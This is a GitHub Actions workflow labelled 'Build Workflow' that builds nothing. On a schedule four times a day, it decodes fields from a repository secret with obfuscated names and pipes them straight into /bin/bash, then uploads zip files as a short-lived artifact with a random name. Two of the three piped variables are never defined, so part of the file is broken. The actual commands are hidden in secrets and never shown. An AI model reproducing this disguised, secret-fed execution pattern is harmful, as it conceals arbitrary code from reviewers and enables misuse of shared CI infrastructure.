name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '1 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          nkx6: ${{ secrets.nkx6 }}
        run: |
          printf '%s' "$nkx6" | jq -r .pw397 | /bin/bash
          printf '%s' "$o8" | jq -r .m30 | /bin/bash
          printf '%s' "$lbb2172" | jq -r .gzwf5327 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: Z2VjPEj9
          path: "*.zip"
          retention-days: 1
